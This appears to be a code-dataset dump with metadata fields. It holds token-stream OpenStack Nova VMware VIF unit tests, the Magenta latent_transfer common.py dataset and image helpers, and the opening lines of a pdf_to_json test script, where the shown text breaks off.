op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'cluster'
op|'='
name|'self'
op|'.'
name|'cluster'
op|','
nl|'\n'
name|'create_vlan'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'network'
op|'='
name|'network_model'
op|'.'
name|'Network'
op|'('
name|'id'
op|'='
number|'0'
op|','
nl|'\n'
name|'bridge'
op|'='
string|"'fa0'"
op|','
nl|'\n'
name|'label'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'vlan'
op|'='
number|'3'
op|','
nl|'\n'
name|'bridge_interface'
op|'='
string|"'eth0'"
op|','
nl|'\n'
name|'injected'
op|'='
name|'True'
op|','
nl|'\n'
name|'should_create_vlan'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'vif'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'id'
op|'='
name|'None'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'network'
op|','
nl|'\n'
name|'type'
op|'='
name|'None'
op|','
nl|'\n'
name|'devname'
op|'='
name|'None'
op|','
nl|'\n'
name|'ovs_interfaceid'
op|'='
name|'None'
op|','
nl|'\n'
name|'rxtx_cap'
op|'='
number|'3'
op|')'
nl|'\n'
op|']'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'vif'
op|'.'
name|'get_network_ref'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'cluster'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_port_group_already_exists
dedent|''
name|'def'
name|'test_create_port_group_already_exists'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'method'
op|'=='
string|"'AddPortGroup'"
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'vexc'
op|'.'
name|'AlreadyExistsException'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_add_vswitch_port_group_spec'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_host_ref'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_add_vswitch'
op|','
name|'_get_host'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'network_util'
op|'.'
name|'create_port_group'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'pg_name'"
op|','
nl|'\n'
string|"'vswitch_name'"
op|','
name|'vlan_id'
op|'='
number|'0'
op|','
nl|'\n'
name|'cluster'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_port_group_exception
dedent|''
dedent|''
name|'def'
name|'test_create_port_group_exception'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'method'
op|'=='
string|"'AddPortGroup'"
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'vexc'
op|'.'
name|'VMwareDriverException'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_add_vswitch_port_group_spec'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_host_ref'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_add_vswitch'
op|','
name|'_get_host'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'vexc'
op|'.'
name|'VMwareDriverException'
op|','
nl|'\n'
name|'network_util'
op|'.'
name|'create_port_group'
op|','
nl|'\n'
name|'self'
op|'.'
name|'session'
op|','
string|"'pg_name'"
op|','
nl|'\n'
string|"'vswitch_name'"
op|','
name|'vlan_id'
op|'='
number|'0'
op|','
nl|'\n'
name|'cluster'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vif_info_none
dedent|''
dedent|''
name|'def'
name|'test_get_vif_info_none'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'vif'
op|'.'
name|'get_vif_info'
op|'('
string|"'fake_session'"
op|','
string|"'fake_cluster'"
op|','
nl|'\n'
string|"'is_neutron'"
op|','
string|"'fake_model'"
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
op|']'
op|','
name|'vif_info'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vif_info_empty_list
dedent|''
name|'def'
name|'test_get_vif_info_empty_list'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'vif'
op|'.'
name|'get_vif_info'
op|'('
string|"'fake_session'"
op|','
string|"'fake_cluster'"
op|','
nl|'\n'
string|"'is_neutron'"
op|','
string|"'fake_model'"
op|','
op|'['
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
op|']'
op|','
name|'vif_info'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vif'
op|','
string|"'get_network_ref'"
op|','
name|'return_value'
op|'='
string|"'fake_ref'"
op|')'
newline|'\n'
DECL|member|test_get_vif_info
name|'def'
name|'test_get_vif_info'
op|'('
name|'self'
op|','
name|'mock_get_network_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'network_info'
op|'='
name|'utils'
op|'.'
name|'get_test_network_info'
op|'('
op|')'
newline|'\n'
name|'vif_info'
op|'='
name|'vif'
op|'.'
name|'get_vif_info'
op|'('
string|"'fake_session'"
op|','
string|"'fake_cluster'"
op|','
nl|'\n'
string|"'is_neutron'"
op|','
string|"'fake_model'"
op|','
name|'network_info'
op|')'
newline|'\n'
name|'expected'
op|'='
op|'['
op|'{'
string|"'iface_id'"
op|':'
name|'utils'
op|'.'
name|'FAKE_VIF_UUID'
op|','
nl|'\n'
string|"'mac_address'"
op|':'
name|'utils'
op|'.'
name|'FAKE_VIF_MAC'
op|','
nl|'\n'
string|"'network_name'"
op|':'
name|'utils'
op|'.'
name|'FAKE_NETWORK_BRIDGE'
op|','
nl|'\n'
string|"'network_ref'"
op|':'
string|"'fake_ref'"
op|','
nl|'\n'
string|"'vif_model'"
op|':'
string|"'fake_model'"
op|'}'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'vif_info'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vif'
op|','
string|"'_check_ovs_supported_version'"
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_ovs_integration_bridge
name|'def'
name|'test_get_neutron_network_ovs_integration_bridge'
op|'('
name|'self'
op|','
nl|'\n'
name|'mock_check'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'integration_bridge'
op|'='
string|"'fake-bridge-id'"
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_OVS'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'network_ref'
op|'='
name|'vif'
op|'.'
name|'_get_neutron_network'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
name|'expected_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
string|"'fake-bridge-id'"
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'opaque'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'False'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_ref'
op|','
name|'network_ref'
op|')'
newline|'\n'
name|'mock_check'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-session'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vif'
op|','
string|"'_check_ovs_supported_version'"
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_ovs
name|'def'
name|'test_get_neutron_network_ovs'
op|'('
name|'self'
op|','
name|'mock_check'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_OVS'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'network_ref'
op|'='
name|'vif'
op|'.'
name|'_get_neutron_network'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
name|'expected_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
number|'0'
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'nsx.LogicalSwitch'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'True'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_ref'
op|','
name|'network_ref'
op|')'
newline|'\n'
name|'mock_check'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-session'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vif'
op|','
string|"'_check_ovs_supported_version'"
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_ovs_logical_switch_id
name|'def'
name|'test_get_neutron_network_ovs_logical_switch_id'
op|'('
name|'self'
op|','
name|'mock_check'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_OVS'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|','
nl|'\n'
name|'details'
op|'='
op|'{'
string|"'nsx-logical-switch-id'"
op|':'
nl|'\n'
string|"'fake-nsx-id'"
op|'}'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'network_ref'
op|'='
name|'vif'
op|'.'
name|'_get_neutron_network'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
name|'expected_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
string|"'fake-nsx-id'"
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'nsx.LogicalSwitch'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'True'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_ref'
op|','
name|'network_ref'
op|')'
newline|'\n'
name|'mock_check'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-session'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_dvs
name|'def'
name|'test_get_neutron_network_dvs'
op|'('
name|'self'
op|','
name|'mock_network_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_network_obj'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|','
nl|'\n'
string|"'dvpg'"
op|':'
string|"'fake-key'"
op|','
nl|'\n'
string|"'dvsw'"
op|':'
string|"'fake-props'"
op|'}'
newline|'\n'
name|'mock_network_name'
op|'.'
name|'return_value'
op|'='
name|'fake_network_obj'
newline|'\n'
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_DVS'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'network_ref'
op|'='
name|'vif'
op|'.'
name|'_get_neutron_network'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
name|'mock_network_name'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fa0'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'fake_network_obj'
op|','
name|'network_ref'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_dvs_vif_details
name|'def'
name|'test_get_neutron_network_dvs_vif_details'
op|'('
name|'self'
op|','
name|'mock_network_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_network_obj'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|','
nl|'\n'
string|"'dvpg'"
op|':'
string|"'pg1'"
op|','
nl|'\n'
string|"'dvsw'"
op|':'
string|"'fake-props'"
op|'}'
newline|'\n'
name|'mock_network_name'
op|'.'
name|'return_value'
op|'='
name|'fake_network_obj'
newline|'\n'
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_DVS'
op|','
nl|'\n'
name|'details'
op|'='
op|'{'
string|"'dvs_port_key'"
op|':'
string|"'key1'"
op|','
nl|'\n'
string|"'dvs_port_group_name'"
op|':'
string|"'pg1'"
op|'}'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'network_ref'
op|'='
name|'vif'
op|'.'
name|'_get_neutron_network'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
name|'mock_network_name'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'pg1'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'fake_network_obj'
op|','
name|'network_ref'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'None'
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_dvs_no_match
name|'def'
name|'test_get_neutron_network_dvs_no_match'
op|'('
name|'self'
op|','
name|'mock_network_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_DVS'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'NetworkNotFoundForBridge'
op|','
nl|'\n'
name|'vif'
op|'.'
name|'_get_neutron_network'
op|','
nl|'\n'
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_neutron_network_invalid_type
dedent|''
name|'def'
name|'test_get_neutron_network_invalid_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'InvalidInput'
op|','
nl|'\n'
name|'vif'
op|'.'
name|'_get_neutron_network'
op|','
nl|'\n'
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vif'
op|'.'
name|'LOG'
op|','
string|"'warning'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vim_util'
op|','
string|"'get_vc_version'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'5.0.0'"
op|')'
newline|'\n'
DECL|member|test_check_invalid_ovs_version
name|'def'
name|'test_check_invalid_ovs_version'
op|'('
name|'self'
op|','
name|'mock_version'
op|','
name|'mock_warning'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif'
op|'.'
name|'_check_ovs_supported_version'
op|'('
string|"'fake_session'"
op|')'
newline|'\n'
comment|'# assert that the min version is in a warning message'
nl|'\n'
name|'expected_arg'
op|'='
op|'{'
string|"'version'"
op|':'
name|'constants'
op|'.'
name|'MIN_VC_OVS_VERSION'
op|'}'
newline|'\n'
name|'version_arg_found'
op|'='
name|'False'
newline|'\n'
name|'for'
name|'call'
name|'in'
name|'mock_warning'
op|'.'
name|'call_args_list'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'call'
op|'['
number|'0'
op|']'
op|'['
number|'1'
op|']'
op|'=='
name|'expected_arg'
op|':'
newline|'\n'
indent|' '
name|'version_arg_found'
op|'='
name|'True'
newline|'\n'
name|'break'
newline|'\n'
dedent|''
dedent|''
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'version_arg_found'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| [
"[email protected]"
] | |
8688f0f01915077265c19b58b0e1101afbd6b545 | 6bf7c633f31b2c7c222f160b5526bde5fa734690 | /magenta/models/latent_transfer/common.py | 4f8028201667b166e47fec00669c1c5d5f950408 | [
"Apache-2.0"
] | permissive | dax-1895/magenta | 04fb27f15fdfd7452980858c364dae46bd861c35 | 4393c218147e92d805bbe85fddebd3397c766715 | refs/heads/master | 2020-04-03T22:29:31.388322 | 2018-10-31T03:39:54 | 2018-10-31T03:39:54 | 155,604,293 | 0 | 1 | Apache-2.0 | 2018-10-31T18:18:48 | 2018-10-31T18:18:47 | null | UTF-8 | Python | false | false | 8,387 | py | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common functions/helpers for dataspace model.
This library contains many common functions and helpers used to for the
dataspace model (defined in `train_dataspace.py`) that is used in training
(`train_dataspace.py` and `train_dataspace_classifier.py`), sampling
(`sample_dataspace.py`) and encoding (`encode_dataspace.py`).
These components are classified in the following categories:
- Loading helper that makes dealing with config / dataset easier. This
includes:
`get_model_uid`, `load_config`, `dataset_is_mnist_family`,
`load_dataset`, `get_index_grouped_by_label`.
- Helper making dumping dataspace data easier. This includes:
`batch_image`, `save_image`, `make_grid`, `post_proc`
- Miscellaneous Helpers, including
`get_default_scratch`, `ObjectBlob`,
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from functools import partial
import importlib
import os
import numpy as np
from PIL import Image
import tensorflow as tf
from magenta.models.latent_transfer import local_mnist
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string(
'default_scratch', '/tmp/', 'The default root directory for scratching. '
'It can contain \'~\' which would be handled correctly.')
def get_default_scratch():
"""Get the default directory for scratching."""
return os.path.expanduser(FLAGS.default_scratch)
class ObjectBlob(object):
"""Helper object storing key-value pairs as attributes."""
def __init__(self, **kwargs):
for k, v in kwargs.items():
self.__dict__[k] = v
def get_model_uid(config_name, exp_uid):
"""Helper function returning model's uid."""
return config_name + exp_uid
def load_config(config_name):
"""Load config from corresponding configs.<config_name> module."""
return importlib.import_module('configs.%s' % config_name).config
def _load_celeba(data_path, postfix):
"""Load the CelebA dataset."""
with tf.gfile.Open(os.path.join(data_path, 'train' + postfix), 'rb') as f:
train_data = np.load(f)
with tf.gfile.Open(os.path.join(data_path, 'eval' + postfix), 'rb') as f:
eval_data = np.load(f)
with tf.gfile.Open(os.path.join(data_path, 'test' + postfix), 'rb') as f:
test_data = np.load(f)
with tf.gfile.Open(os.path.join(data_path, 'attr_train.npy'), 'rb') as f:
attr_train = np.load(f)
with tf.gfile.Open(os.path.join(data_path, 'attr_eval.npy'), 'rb') as f:
attr_eval = np.load(f)
with tf.gfile.Open(os.path.join(data_path, 'attr_test.npy'), 'rb') as f:
attr_test = np.load(f)
attr_mask = [4, 8, 9, 11, 15, 20, 24, 31, 35, 39]
attribute_names = [
'Bald',
'Black_Hair',
'Blond_Hair',
'Brown_Hair',
'Eyeglasses',
'Male',
'No_Beard',
'Smiling',
'Wearing_Hat',
'Young',
]
attr_train = attr_train[:, attr_mask]
attr_eval = attr_eval[:, attr_mask]
attr_test = attr_test[:, attr_mask]
return (train_data, eval_data, test_data, attr_train, attr_eval, attr_test,
attribute_names)
def dataset_is_mnist_family(dataset):
"""returns if dataset is of MNIST family."""
return dataset.lower() == 'mnist' or dataset.lower() == 'fashion-mnist'
def load_dataset(config):
"""Load dataset following instruction in `config`."""
if dataset_is_mnist_family(config['dataset']):
crop_width = config.get('crop_width', None) # unused
img_width = config.get('img_width', None) # unused
scratch = config.get('scratch', get_default_scratch())
basepath = os.path.join(scratch, config['dataset'].lower())
data_path = os.path.join(basepath, 'data')
save_path = os.path.join(basepath, 'ckpts')
tf.gfile.MakeDirs(data_path)
tf.gfile.MakeDirs(save_path)
# black-on-white MNIST (harder to learn than white-on-black MNIST)
# Running locally (pre-download data locally)
mnist_train, mnist_eval, mnist_test = local_mnist.read_data_sets(
data_path, one_hot=True)
train_data = np.concatenate([mnist_train.images, mnist_eval.images], axis=0)
attr_train = np.concatenate([mnist_train.labels, mnist_eval.labels], axis=0)
eval_data = mnist_test.images
attr_eval = mnist_test.labels
attribute_names = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
elif config['dataset'] == 'CELEBA':
crop_width = config['crop_width']
img_width = config['img_width']
postfix = '_crop_%d_res_%d.npy' % (crop_width, img_width)
# Load Data
scratch = config.get('scratch', get_default_scratch())
basepath = os.path.join(scratch, 'celeba')
data_path = os.path.join(basepath, 'data')
save_path = os.path.join(basepath, 'ckpts')
(train_data, eval_data, _, attr_train, attr_eval, _,
attribute_names) = _load_celeba(data_path, postfix)
else:
raise NotImplementedError
return ObjectBlob(
crop_width=crop_width,
img_width=img_width,
basepath=basepath,
data_path=data_path,
save_path=save_path,
train_data=train_data,
attr_train=attr_train,
eval_data=eval_data,
attr_eval=attr_eval,
attribute_names=attribute_names,
)
def get_index_grouped_by_label(label):
"""Get (an array of) index grouped by label.
This array is used for label-level sampling.
It aims at MNIST and CelebA (in Jesse et al. 2018) with 10 labels.
Args:
label: a list of labels in integer.
Returns:
A (# label - sized) list of lists contatining indices of that label.
"""
index_grouped_by_label = [[] for _ in range(10)]
for i, label in enumerate(label):
index_grouped_by_label[label].append(i)
return index_grouped_by_label
def batch_image(b, max_images=64, rows=None, cols=None):
"""Turn a batch of images into a single image mosaic."""
mb = min(b.shape[0], max_images)
if rows is None:
rows = int(np.ceil(np.sqrt(mb)))
cols = rows
diff = rows * cols - mb
b = np.vstack([b[:mb], np.zeros([diff, b.shape[1], b.shape[2], b.shape[3]])])
tmp = b.reshape(-1, cols * b.shape[1], b.shape[2], b.shape[3])
img = np.hstack(tmp[i] for i in range(rows))
return img
def save_image(img, filepath):
"""Save an image to filepath.
It assumes `img` is a float numpy array with value in [0, 1]
Args:
img: a float numpy array with value in [0, 1] representing the image.
filepath: a string of file path.
"""
img = np.maximum(0, np.minimum(1, img))
im = Image.fromarray(np.uint8(img * 255))
im.save(filepath)
def make_grid(boundary=2.0, number_grid=50, dim_latent=2):
"""Helper function making 1D or 2D grid for evaluation purpose."""
zs = np.linspace(-boundary, boundary, number_grid)
z_grid = []
if dim_latent == 1:
for x in range(number_grid):
z_grid.append([zs[x]])
dim_grid = 1
else:
for x in range(number_grid):
for y in range(number_grid):
z_grid.append([0.] * (dim_latent - 2) + [zs[x], zs[y]])
dim_grid = 2
z_grid = np.array(z_grid)
return ObjectBlob(z_grid=z_grid, dim_grid=dim_grid)
def make_batch_image_grid(dim_grid, number_grid):
"""Returns a patched `make_grid` function for grid."""
assert dim_grid in (1, 2)
if dim_grid == 1:
batch_image_grid = partial(
batch_image,
max_images=number_grid,
rows=1,
cols=number_grid,
)
else:
batch_image_grid = partial(
batch_image,
max_images=number_grid * number_grid,
rows=number_grid,
cols=number_grid,
)
return batch_image_grid
def post_proc(img, config):
"""Post process image `img` according to the dataset in `config`."""
x = img
x = np.minimum(1., np.maximum(0., x)) # clipping
if dataset_is_mnist_family(config['dataset']):
x = np.reshape(x, (-1, 28, 28))
x = np.stack((x,) * 3, -1) # grey -> rgb
return x
| [
"[email protected]"
] | |
8164c15ce080bba486b0e97395893638e109f140 | 673e829dda9583c8dd2ac8d958ba1dc304bffeaf | /data/multilingual/Latn.QVA/Sun-ExtA_16/pdf_to_json_test_Latn.QVA_Sun-ExtA_16.py | c9e6eeadc61bf0cfc64ae23cd016123070abc397 | [
"BSD-3-Clause"
] | permissive | antoinecarme/pdf_to_json_tests | 58bab9f6ba263531e69f793233ddc4d33b783b7e | d57a024fde862e698d916a1178f285883d7a3b2f | refs/heads/master | 2021-01-26T08:41:47.327804 | 2020-02-27T15:54:48 | 2020-02-27T15:54:48 | 243,359,934 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | import pdf_to_json as p2j
import json
